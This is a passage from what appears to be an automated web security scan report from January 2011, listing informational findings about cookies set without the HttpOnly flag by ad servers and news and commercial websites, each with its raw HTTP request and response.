GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:59:18 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:59:18 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

GIF89a.............!.......,...........D..;

11.558. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:08 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">her
...[SNIP]...

11.559. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64 HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Sat, 29 Jan 2011 01:41:07 GMT
Content-Length: 0
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/


11.560. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:42:58 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:42:57 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

GIF89a.............!.......,...........D..;

11.561. http://tr.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: spvdr=vd=1b813c63-80cf-4620-830f-91884d66145b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 18499
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...

11.562. http://tr.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ahbkj055dgf1da55e50xhpyx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ahbkj055dgf1da55e50xhpyx; path=/; HttpOnly
Set-Cookie: spvdr=vd=9cf4ee93-149b-445d-b620-18522f529033&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: ptr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:32 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.563. http://voken.eyereturn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233374&click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000943795/cstr=91575939=_4d4372e7,6205162343,766161^943795^1183^0,1_/xsxdata=$xsxdata/bnum=91575939/optn=64?trg=&params=6205162343 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:52:40 GMT
Server: eyeReturn Ad Server
Content-Length: 14762

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233375';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_728x90_f_30_v1.swf';er_token
...[SNIP]...

11.564. http://voken.eyereturn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/
Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Location: http://voken.eyereturn.com/pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303
Content-Length: 0
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6


11.565. http://voken.eyereturn.com/pb/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pb/get

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14757

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...

11.566. http://voken.eyereturn.com/pix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pix?223686 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Fri, 28 Jan 2011 23:49:08 GMT
Connection: close
Server: eyeReturn Ad Serveri 6

GIF89a.............!...
...,...........L..;

11.567. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

11.568. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1127760205.2705065472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:05:58 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31059
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

11.569. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=elqucae4pira41q1xauy2i45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

11.570. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:48 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223848"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/
Content-Length: 95223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.571. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:10:49 GMT
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1296223849"
Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly
Connection: close
